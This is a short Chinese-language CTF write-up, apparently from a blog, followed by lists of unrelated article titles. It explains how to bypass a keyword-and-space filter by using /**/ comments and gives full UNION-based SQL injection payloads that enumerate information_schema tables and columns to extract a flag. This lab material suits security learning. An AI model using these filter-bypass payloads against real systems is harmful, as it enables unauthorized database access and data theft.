输入union select、order by这些关键字会提示SQLi detected! 说明对于关键字有防护

输入1 union也会提示SQLi detected! 但是如果去掉空格:1union,则会返回正常,1'and'1'='1(无空格)也返回正常

所以可能是过滤了空格。

于是用/**/ 或++代替掉空格。

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

后面单独的'用了闭合掉一个'号

最下面看到flag表,于是再用1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag    得到

得到flag这个column,再查找其内容:1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

就拿到flag了。

最新文章

  1. HTML 5 音频(audio)
  2. java之DatagramSocket、DatagramPackage丶MulticastSocket 广播学习
  3. 【python】selenium+python自动化测试环境搭建
  4. Git入门学习和应用笔记
  5. ajax用户名案例(重点)
  6. 每天一道LeetCode--342. Power of Four
  7. 【Leetcode】Binary Tree Level Order Traversal
  8. struts2 实现过程和xml配置
  9. thinkphp 3.1.3 redis 只能读取 无法写入的问题
  10. appium 报错
  11. QT vs x64编译
  12. Java:集合,Map接口框架图
  13. python重定向sys.stdin、sys.stdout和sys.stderr
  14. Linux内核 runtime_PM 框架
  15. js不管条件是否成立都要进行变量提升
  16. lr的脚本调试方法
  17. Sails 框架学习资料
  18. Force SDK to create Appointment programmatically in crm 2013 onPremise
  19. 洛谷 P1108 低价购买 解题报告
  20. flask-SQLAlchemy的ORM

热门文章

  1. 禁用UpdateOrchestrator重新启动任务
  2. k-近邻算法采用for循环调参方法
  3. JVM性能调优指南
  4. Linux 内核 编译模块
  5. Http与Https协议规范
  6. 05.swoole学习笔记--定时器
  7. 自定义对象使用 ArrayList 进行增删改查(dos程序)
  8. 51nod 1294 :修改数组 && HDU 5256:序列变换
  9. (转)让一个进程启动时Windbg自动Attach上去
  10. JSP编码规范